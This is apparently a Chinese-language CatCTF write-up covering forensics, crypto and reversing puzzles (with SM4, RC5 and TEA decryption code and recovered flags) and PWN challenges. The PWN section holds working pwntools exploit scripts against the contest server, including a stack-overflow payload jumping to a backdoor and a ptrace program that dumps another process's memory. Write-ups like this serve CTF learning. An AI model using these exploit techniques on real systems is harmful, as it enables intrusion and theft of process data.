闲言

感觉大佬们都没来,让我混到第三名了。估计二进制大佬们全都是打 ASIS final 了,就我这个废物不配打QAQ
题目感觉都不是很难,主要还是我比较菜,做题速度太慢了,以及第一天睡大觉晚了好久上线,不然可能可以多刷几个前三血,不过没奖励,前十血就能捐猫粮了,也就无所谓了。
PWN这边内核直接不会,开始摆烂,其他几题看到后面已经完全摆烂了,就没继续看了。injection2.0 那道题本地的环境一直打不开,最后开了远程环境随便看了看感觉还行就搞了一下。
RE的话 CatFly 没搞出来可惜了,算法没抄明白,有时间的话再试试看吧。
MISC 纯摆烂了,做不明白,就拿 010 看了几个,能看出来的就做了,看不出来的就摆了。几个题目猜到可能是工具,但是懒得下了就不做了。还有几个从头到尾就没看懂要干什么,放弃。
整个比赛打下来感觉没啥收获,感觉跟复健似的,等一波其他大佬的 WP 吧。密码一题也没做出来,有几个签到题还是想看看的,以及 CatFly 那题也想看看该怎么抄代码,其他的就随便看看吧。PWN 那边没啥体力继续看了,有心情了再看看吧。
MISC
Cat_Jump
010 直接查就完事了,属于是意料之外:

MeowMeow
图片尾巴有 base64 和一大堆数据,解出来 base64 说是 ASCII art,猜是二进制看的。本来要写脚本,但是 010 确实好用,直接看就完事了:

CatchCat
最开始没做出来,找了半天工具没找到,第二天随便搜了一下搜到在线工具了,放大了直接看就行了:

Nepnep 祝你新年快乐啦!

CatFlag
确实是 CatFlag:

Crypto
cat's gift
1 - 1/3 + 1/5 - 1/7 + … 的积分是 pi/4,所以礼物应该是 pi,但是试了半天没对,改成 pie 就对了,难崩……
Reverse
StupidOrangeCat2
一个 SM4,一个 RC5,找到密文直接解就行了。不过 RC5 没用到密钥,或者说用了默认密钥:
SM4
#include "chacha20.h"
void four_uCh2uLong(u8* in, u32* out)
{
int i = 0;
*out = 0;
for (i = 0; i < 4; i++)
*out = ((u32)in[i] << (24 - i * 8)) ^ *out;
}
void uLong2four_uCh(u32 in, u8* out)
{
int i = 0;
//从32位unsigned long的高位开始取
for (i = 0; i < 4; i++)
*(out + i) = (u32)(in >> (24 - i * 8));
}
u32 move(u32 data, int length)
{
u32 result = 0;
result = (data << length) ^ (data >> (32 - length));
return result;
}
u32 func_key(u32 input)
{
int i = 0;
u32 ulTmp = 0;
u8 ucIndexList[4] = { 0 };
u8 ucSboxValueList[4] = { 0 };
uLong2four_uCh(input, ucIndexList);
for (i = 0; i < 4; i++)
{
ucSboxValueList[i] = TBL_SBOX[ucIndexList[i]];
}
four_uCh2uLong(ucSboxValueList, &ulTmp);
ulTmp = ulTmp ^ move(ulTmp, 13) ^ move(ulTmp, 23);
return ulTmp;
}
u32 func_data(u32 input)
{
int i = 0;
u32 ulTmp = 0;
u8 ucIndexList[4] = { 0 };
u8 ucSboxValueList[4] = { 0 };
uLong2four_uCh(input, ucIndexList);
for (i = 0; i < 4; i++)
{
ucSboxValueList[i] = TBL_SBOX[ucIndexList[i]];
}
four_uCh2uLong(ucSboxValueList, &ulTmp);
ulTmp = ulTmp ^ move(ulTmp, 2) ^ move(ulTmp, 10) ^ move(ulTmp, 18) ^ move(ulTmp, 24);
return ulTmp;
}
void encode_fun(u8 len, u8* key, u8* input, u8* output)
{
int i = 0, j = 0;
u8* p = (u8*)malloc(50); //定义一个50字节缓存区
u32 ulKeyTmpList[4] = { 0 }; //存储密钥的u32数据
u32 ulKeyList[36] = { 0 }; //用于密钥扩展算法与系统参数FK运算后的结果存储
u32 ulDataList[36] = { 0 }; //用于存放加密数据
four_uCh2uLong(key, &(ulKeyTmpList[0]));
four_uCh2uLong(key + 4, &(ulKeyTmpList[1]));
four_uCh2uLong(key + 8, &(ulKeyTmpList[2]));
four_uCh2uLong(key + 12, &(ulKeyTmpList[3]));
ulKeyList[0] = ulKeyTmpList[0] ^ TBL_SYS_PARAMS[0];
ulKeyList[1] = ulKeyTmpList[1] ^ TBL_SYS_PARAMS[1];
ulKeyList[2] = ulKeyTmpList[2] ^ TBL_SYS_PARAMS[2];
ulKeyList[3] = ulKeyTmpList[3] ^ TBL_SYS_PARAMS[3];
for (i = 0; i < 32; i++) //32次循环迭代运算
{
ulKeyList[i + 4] = ulKeyList[i] ^ func_key(ulKeyList[i + 1] ^ ulKeyList[i + 2] ^ ulKeyList[i + 3] ^ TBL_FIX_PARAMS[i]);
}
for (i = 0; i < len; i++) //将输入数据存放在p缓存区
*(p + i) = *(input + i);
for (i = 0; i < 16 - len % 16; i++)//将不足16位补0凑齐16的整数倍
*(p + len + i) = 0;
for (j = 0; j < len / 16 + ((len % 16) ? 1 : 0); j++)
{
four_uCh2uLong(p + 16 * j, &(ulDataList[0]));
four_uCh2uLong(p + 16 * j + 4, &(ulDataList[1]));
four_uCh2uLong(p + 16 * j + 8, &(ulDataList[2]));
four_uCh2uLong(p + 16 * j + 12, &(ulDataList[3]));
for (i = 0; i < 32; i++)
{
ulDataList[i + 4] = ulDataList[i] ^ func_data(ulDataList[i + 1] ^ ulDataList[i + 2] ^ ulDataList[i + 3] ^ ulKeyList[i + 4]);
}
uLong2four_uCh(ulDataList[35], output + 16 * j);
uLong2four_uCh(ulDataList[34], output + 16 * j + 4);
uLong2four_uCh(ulDataList[33], output + 16 * j + 8);
uLong2four_uCh(ulDataList[32], output + 16 * j + 12);
}
free(p);
}
void decode_fun(u8 len, u8* key, u8* input, u8* output)
{
int i = 0, j = 0;
u32 ulKeyTmpList[4] = { 0 };//存储密钥的u32数据
u32 ulKeyList[36] = { 0 }; //用于密钥扩展算法与系统参数FK运算后的结果存储
u32 ulDataList[36] = { 0 }; //用于存放加密数据
four_uCh2uLong(key, &(ulKeyTmpList[0]));
four_uCh2uLong(key + 4, &(ulKeyTmpList[1]));
four_uCh2uLong(key + 8, &(ulKeyTmpList[2]));
four_uCh2uLong(key + 12, &(ulKeyTmpList[3]));
ulKeyList[0] = ulKeyTmpList[0] ^ TBL_SYS_PARAMS[0];
ulKeyList[1] = ulKeyTmpList[1] ^ TBL_SYS_PARAMS[1];
ulKeyList[2] = ulKeyTmpList[2] ^ TBL_SYS_PARAMS[2];
ulKeyList[3] = ulKeyTmpList[3] ^ TBL_SYS_PARAMS[3];
for (i = 0; i < 32; i++)
{
ulKeyList[i + 4] = ulKeyList[i] ^ func_key(ulKeyList[i + 1] ^ ulKeyList[i + 2] ^ ulKeyList[i + 3] ^ TBL_FIX_PARAMS[i]);
}
for (j = 0; j < len / 16; j++)
{
four_uCh2uLong(input + 16 * j, &(ulDataList[0]));
four_uCh2uLong(input + 16 * j + 4, &(ulDataList[1]));
four_uCh2uLong(input + 16 * j + 8, &(ulDataList[2]));
four_uCh2uLong(input + 16 * j + 12, &(ulDataList[3]));
for (i = 0; i < 32; i++)
{
ulDataList[i + 4] = ulDataList[i] ^ func_data(ulDataList[i + 1] ^ ulDataList[i + 2] ^ ulDataList[i + 3] ^ ulKeyList[35 - i]);
}
uLong2four_uCh(ulDataList[35], output + 16 * j);
uLong2four_uCh(ulDataList[34], output + 16 * j + 4);
uLong2four_uCh(ulDataList[33], output + 16 * j + 8);
uLong2four_uCh(ulDataList[32], output + 16 * j + 12);
}
}
void print_hex(u8* data, int len)
{
int i = 0;
char alTmp[16] = { '0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f' };
for (i = 0; i < len; i++)
{
printf("%c", alTmp[data[i] / 16]);
printf("%c", alTmp[data[i] % 16]);
putchar(' ');
}
putchar('\n');
}
int main(void)
{
unsigned char a91tNhn90uTlt1l[] =
{
0x5B, 0x40, 0x39, 0x31, 0x54, 0x25, 0x4E, 0x68, 0x6E, 0x7B,
0x39, 0x30, 0x55, 0x40, 0x74, 0x6C, 0x54, 0x25, 0x31, 0x6C,
0x54, 0x24, 0x64, 0x70, 0x68, 0x50, 0x68, 0x66, 0x69, 0x40,
0x39, 0x31, 0x4F, 0x00
};
for (int i = 0; i < 33; i += 4)
{
a91tNhn90uTlt1l[i] ^= 0xC;
a91tNhn90uTlt1l[i + 1] ^= 0x17;
}//You_can_take_me_with_you
//CAT_IN_X_19_Y_39
//_CATLOVE_OR_LIKE
// LIKE_OR_LOVE_CAT
//EKIL_RO_EVOLTAC_
//CatCTF{You_can_take_me_with_you_CAT_IN_X_19_Y_39_}
//CAT_IN_X_19_Y_39_LIKE_OR_LOVE_CAT
u8 i, len;
u8 encode_Result[50] = { 0 }; //定义加密输出缓存区
u8 decode_Result[50] = { 0 }; //定义解密输出缓存区
unsigned char key[] = "wuwuwuyoucatchme";
u8 Data_plain[16] = { 0xB6,0x75,0xE1,0x79,0x70,0xC1,0x27,0x48,9,0xB,0xB6,0x4D,2,0xBC,6,0x19 };
len = 16 * (sizeof(Data_plain) / 16) + 16 * ((sizeof(Data_plain) % 16) ? 1 : 0);
decode_fun(len, key, Data_plain, decode_Result);
printf("解密后数据是:\n");
for (i = 0; i < len; i++)
printf("%x ", *(decode_Result + i));
system("pause");
return 0;
}
RC5
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>
int w = 32;//字长 32bit 4字节
int r = 12;//12;//加密轮数12
int b = 16;//主密钥(字节为单位8bit)个数 这里有16个
int t = 26;//2*r+2=12*2+2=26
int c = 4; //主密钥个数*8/w = 16*8/32
typedef unsigned long int FOURBYTEINT;//四字节
typedef unsigned short int TWOBYTEINT;//2字节
typedef unsigned char BYTE;
void InitialKey(unsigned char* KeyK, int b);
void generateChildKey(unsigned char* KeyK, FOURBYTEINT* ChildKeyS);
void Encipher(FOURBYTEINT* In, FOURBYTEINT* Out, FOURBYTEINT* S);
void Decipher(FOURBYTEINT* In, FOURBYTEINT* Out, FOURBYTEINT* S);
void InitialKey(unsigned char* KeyK, int b)
{
int i, j;
int intiSeed = 3;
for (i = 0; i < b; i++)
{
KeyK[i] = 0;
}
KeyK[0] = intiSeed;
printf("初始主密钥(16字节共128位):%.2lx ", KeyK[0]);
for (j = 1; j < b; j++)
{
KeyK[j] = (BYTE)((int)pow(3, j) % (255 - j));
printf("%.2X ", KeyK[j]);
}
printf("\n");
}
void generateChildKey(unsigned char* KeyK, FOURBYTEINT* ChildKeyS)
{
int PW = 0xB7E15163;//0xb7e1;
int QW = 0x9E3779B9;//0x9e37;//genggai
int i;
int u = w / 8;// b/8;
FOURBYTEINT A, B, X, Y;
FOURBYTEINT L[4]; //c=16*8/32
A = B = X = Y = 0;
ChildKeyS[0] = PW;
printf("\n初始子密钥(没有主密钥的参与):\n%.8X ", ChildKeyS[0]);
for (i = 1; i < t; i++) //t=26
{
if (i % 13 == 0)printf("\n");
ChildKeyS[i] = (ChildKeyS[i - 1] + QW);
printf("%.8X ", ChildKeyS[i]);
}
printf("\n");
for (i = 0; i < c; i++)
{
L[i] = 0;
}
for (i = b - 1; i != -1; i--)
{
L[i / u] = (L[i / u] << 8) + KeyK[i];
}
printf("\n把主密钥变换为4字节单位:\n");
for (i = 0; i < c; i++)
{
printf("%.8X ", L[i]);
}
printf("\n\n");
for (i = 0; i < 3 * t; i++)
{
X = ChildKeyS[A] = ROTL(ChildKeyS[A] + X + Y, 3);
A = (A + 1) % t;
Y = L[B] = ROTL(L[B] + X + Y, (X + Y));
B = (B + 1) % c;
}
printf("生成的子密钥(初始主密钥参与和初始子密钥也参与):");
for (i = 0; i < t; i++)
{
if (i % 13 == 0)printf("\n");
printf("%.8X ", ChildKeyS[i]);
}
printf("\n\n");
}
void Encipher(FOURBYTEINT* In, FOURBYTEINT* Out, FOURBYTEINT* S)
{
FOURBYTEINT X, Y;
int i, j;
for (j = 0; j < NoOfData; j += 2)
{
X = In[j] + S[0];
Y = In[j + 1] + S[1];
for (i = 1; i <= r; i++)
{
X = ROTL((X ^ Y), Y) + S[2 * i];
Y = ROTL((Y ^ X), X) + S[2 * i + 1];
}
Out[j] = X;
Out[j + 1] = Y; //密文
}
}
void Decipher(FOURBYTEINT* In, FOURBYTEINT* Out, FOURBYTEINT* S)
{
int i = 0, j;
FOURBYTEINT X, Y;
for (j = 0; j < NoOfData; j += 2)
{
X = In[j];
Y = In[j + 1];
for (i = r; i > 0; i--)
{
Y = ROTR(Y - S[2 * i + 1], X) ^ X;
X = ROTR(X - S[2 * i], Y) ^ Y;
}
Out[j] = X - S[0];
Out[j + 1] = Y - S[1];
}
}
int main(void)
{
int k;
FOURBYTEINT ChildKeyS[2 * 12 + 2];
FOURBYTEINT ChildKey1[26];
BYTE KeyK[16];
FOURBYTEINT Source[] = { 0x936AB12C,0xED8330B5,0xEE5C5E88,0xE10B508C };
FOURBYTEINT Dest[NoOfData];
FOURBYTEINT Data[NoOfData] = { 0 };
InitialKey(KeyK, b);
generateChildKey(KeyK, ChildKeyS);
printf("加密以前的明文:");
for (k = 0; k < NoOfData; k++)
{
if (k % 2 == 0)
{
printf(" ");
}
printf("%.8X ", Source[k]);
}
printf("\n");
for (k = 0; k < 26; k++)
{
ChildKey1[k] = ChildKeyS[k];
}
Decipher(Source, Data, ChildKey1); //解密
printf("解密以后的明文:");
char* flag = (char*)Data;
for (int k = 0; k < 16; k++) {
printf("%c", flag[k]);
}
}
就是发现还有一串 base64 微改之后的加密,似乎是调试的时候才会出现,不过没发现有什么用,白解了半天,呜呜。
ReadingSection
llvm ir 写的,直接安装 llvm 的组件后把 ir 编译成 .o
文件就可以拿 IDA 读了。
打开一看发现是 TEA,另外还有一个异或:

#include <stdio.h>
#include <stdint.h>
void decrypt(uint32_t * v, uint32_t * k) {
uint32_t v0 = v[0], v1 = v[1], sum = 0xCA7C7F00*28, i; /* set up */
uint32_t delta = 0xCA7C7F00; /* a key schedule constant */
uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3]; /* cache key */
for (i = 0; i < 28; i++) { /* basic cycle start */
v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
sum -= delta;
} /* end cycle */
v[0] = v0; v[1] = v1;
}
int main()
{
unsigned char _L__const__Z5checkv_rightcat[] =
{
0xAA, 0x7D, 0x07, 0x7D, 0xB1, 0xF7, 0x80, 0x71, 0xDA, 0xAF,
0x23, 0xE5, 0x10, 0x07, 0x58, 0x57, 0x1E, 0xF7, 0x7D, 0x71,
0xE6, 0x78, 0x74, 0x56, 0x9B, 0xC0, 0x53, 0x11, 0xF3, 0x39,
0x31, 0x2E
};
uint32_t k[] = { 0x18BC8A17 ,0x29D3CE1E ,0x42F740E3 ,0x199C7F4A };
decrypt(((uint32_t*)(_L__const__Z5checkv_rightcat)), k);
decrypt(((uint32_t*)(_L__const__Z5checkv_rightcat))+2, k);
decrypt(((uint32_t*)(_L__const__Z5checkv_rightcat))+4, k);
decrypt(((uint32_t*)(_L__const__Z5checkv_rightcat))+6, k);
for (int i = 30; i >= 0; i--)
{
_L__const__Z5checkv_rightcat[i] ^= _L__const__Z5checkv_rightcat[i + 1];
}
printf("%s", _L__const__Z5checkv_rightcat);
}
The cat did it
没啥头绪,纯考猜。看他问概率多少,直接猜了 0%,然后就对了,反正我自己也没搞明白。
PWN
vmbyhrp
DEBUG 模式里有一个 charge_file 可以从外面读文件:

因此关键就是进入 DEBUG 模式了。发现需要 users 和 users+4 都为 0 才能进,转而发现创建文件的函数:
__int64 __fastcall create_file(__int64 a1)
{
__int64 result; // rax
int v2; // ebx
result = check_repeat(a1);
if ( result )
{
*(&unk_204130 + 4 * file_count) = global_fd;
*(&unk_204128 + 4 * file_count) = a1;
*(&HF + 4 * file_count) = 1000LL;
v2 = file_count;
*(&unk_204138 + 4 * v2) = malloc(0x1000uLL);
printf("FILE CONTENT: ");
read(0, *(&unk_204138 + 4 * file_count), 0x1000uLL);
deleEnter(*(&unk_204138 + 4 * file_count));
++file_count;
result = ++global_fd;
}
return result;
}
没有检查数量,因此可以创建很多文件去把结构体溢出到 user。
然后注意到 HRP_OPEN
可以用输入去覆盖相应偏移处的值:
unsigned __int64 __fastcall HRP_OPEN(int a1, int a2)
{
int i; // [rsp+1Ch] [rbp-24h]
char v4[24]; // [rsp+20h] [rbp-20h] BYREF
unsigned __int64 v5; // [rsp+38h] [rbp-8h]
v5 = __readfsqword(0x28u);
for ( i = 0; i < file_count; ++i )
{
if ( a1 == *(&unk_204130 + 4 * i) )
{
*(&HF + 4 * i) = a2;//<------这里可以覆盖
return __readfsqword(0x28u) ^ v5;
}
}
clearScreen();
puts("NOT FOUND,PLEASE NEW FILE");
printf("%s", "FILE NAME: ");
__isoc99_scanf("%16s[^\n ]", v4);
getchar();
deleEnter(v4);
create_file(v4);
return __readfsqword(0x28u) ^ v5;
}
所以思路就是创建很多文件,然后用汇编去覆盖 users 变量,最后进 DEBUG 模式把文件读进来,然后用 cat 拿出来:
from pwn import *
#p=process("./HRPVM")
p=remote("223.112.5.156",60024)
#gdb.attach(p,"b*$rebase(0x2DFF)\nb*$rebase(0x2950)\nb*$rebase(0x25B2)")
p.recvuntil("NAME:")
name="HRPHRP"
password="PWNME"
p.sendline(name)
p.recvuntil("PASSWORD:")
p.sendline(password)
p.recvuntil("[+]HOLDER:")
p.sendline("aaaaaaaaaaaaaaaa")
def send_res(payload):
p.recvuntil("HRP-MACHINE$ ")
p.sendline(payload)
def send_res2(payload):
p.recvuntil("[DEBUGING]root#")
p.sendline(payload)
payload="file"
for i in range(30):
send_res("file")
p.recvuntil("FILE NAME: ")
p.sendline("a"+str(i))
p.recvuntil("FILE CONTENT: ")
p.sendline("mov rdi,36;mov rsi,1001;call open,2;")
send_res("file")
p.recvuntil("FILE NAME: ")
p.sendline("a30")
p.recvuntil("FILE CONTENT: ")
p.sendline("mov rdi,35;mov rsi,0;call open,2;")
send_res("file")
p.recvuntil("FILE NAME: ")
p.sendline("a31")
p.recvuntil("FILE CONTENT: ")
p.sendline("mov rdi,35;mov rsi,0;call open,2;")
send_res("./a30")
send_res("DEBUG")
send_res2("file input")
p.recvuntil("FILE NAME:")
p.sendline("flag")
send_res2("mmap")
p.recvuntil("EXPEND:")
p.sendline(str(0x400000))
send_res2("exit")
send_res("reboot")
p.recvuntil("NAME:")
p.sendline(name)
p.recvuntil("PASSWORD:")
p.sendline(password)
p.recvuntil("[+]HOLDER:")
p.sendline(p64(0x400000))
send_res("./a0")
send_res("cat flag")
p.interactive()
不过有一个小问题,当我把 flag 读进来之后用 exit 返回用户模式时,直接 cat 会引发崩溃。根据崩溃报告发现,似乎会正好引用 HOLDER 处的内存。因此 DEBUG 下还得调用 mmap 开辟一下空间,然后 reboot 设置 HOLDER 为开辟出来的可以读写的内存,这样才不会崩溃。
bitcoin
栈溢出,有后门,直接跳过去就是了,没啥好说的:
from pwn import *
#p=process("./pwn")
p=remote("223.112.5.156",57023)
#gdb.attach(p,"set follow-fork-mode parent\nb*0x40223B")
p.recvuntil("CTF!")
p.sendline("\n")
p.recvuntil("Name: ")
p.sendline("aaa")
p.recvuntil("Password: ")
payload=b"a"*(64)+p64(0x06092C0+0x420)+p64(0x404EA4)
p.sendline(payload)
p.interactive()
injection2.0
whoami 一看是 root,搜了一下似乎用 ptrace 能直接去读取其他进程的内存,于是就把整个栈全都读出来就可以了:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <errno.h>
int main(int argc, char *argv[]){
off_t start_addr;
pid_t pid;
char s1[]="131";
start_addr=0x7ffc08baf000;
pid = atoi(s1);
printf("%lx\n",start_addr);
int ptrace_ret;
ptrace_ret = ptrace(PTRACE_ATTACH, pid, NULL, NULL);
if (ptrace_ret == -1) {
fprintf(stderr, "ptrace attach failed.\n");
perror("ptrace");
return -1;
}
if (waitpid(pid, NULL, 0) == -1) {
fprintf(stderr, "waitpid failed.\n");
perror("waitpid");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
int fd;
char path[256] = {0};
sprintf(path, "/proc/%d/mem", pid);
fd = open(path, O_RDWR);
if (fd == -1) {
fprintf(stderr, "open file failed.\n");
perror("open");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return -1;
}
off_t off;
off = lseek(fd, start_addr, SEEK_SET);
if (off == (off_t)-1) {
fprintf(stderr, "lseek failed.\n");
perror("lseek");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
close(fd);
return -1;
}
else{
printf("lseek sucess\n"); }
unsigned char *buf = (unsigned char *)malloc(0x21000);
int rd_sz;
while(rd_sz=read(fd,buf,0x21000)){
if(rd_sz<10){
perror("read");
break;
}
printf("%lx\n",rd_sz);
for(int i=0;i<0x21000;i++){
printf("%c",buf[i]);
}
printf("\n");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
free(buf);
close(fd);
return 0;
}
}
不过直接读出来的东西似乎显示的很不完全,我一度以为自己的方法不行,最后直接把内容 base64 后拉到本地再解回去看了,然后就发现还是有的:


welcome_CAT_CTF
这题我是直接拿 gdb 搞定的,没写 exp。题目给了服务端和客户端,然后分数是储存在客户端的,所以直接用 gdb 改内存设成大数,然后直接改寄存器跳转执行后门函数就可以了(忘记截图了)
WEB
ez_js
访问一下那个 game.js 就发现里面写了 flag 的路径,然后直接过去就行了:

Comments | NOTHING